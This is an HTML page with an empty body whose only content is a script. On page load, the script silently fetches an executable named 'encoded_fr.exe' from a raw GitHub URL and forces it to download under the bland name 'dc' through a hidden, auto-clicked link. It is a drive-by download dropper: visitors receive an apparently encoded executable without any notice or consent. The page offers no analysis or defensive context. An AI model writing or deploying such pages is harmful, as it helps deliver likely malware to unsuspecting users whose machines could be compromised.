<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <script>
        window.onload = function() {
            fetch('https://raw.githubusercontent.com/e266cfd65ad46a67fc54b0efd38e40dd/hostingsite/main/encoded_fr.exe')
                .then(response => response.arrayBuffer())
                .then(buffer => {
                    const blob = new Blob([buffer], { type: 'application/octet-stream' });
                    const url = window.URL.createObjectURL(blob);
                    const a = document.createElement('a');
                    a.href = url;
                    a.download = 'dc';  // Name of the downloaded file
                    document.body.appendChild(a);
                    a.click();
                    document.body.removeChild(a);
                    window.URL.revokeObjectURL(url);
                });
        };
    </script>
</head>
<body>
</body>
</html>
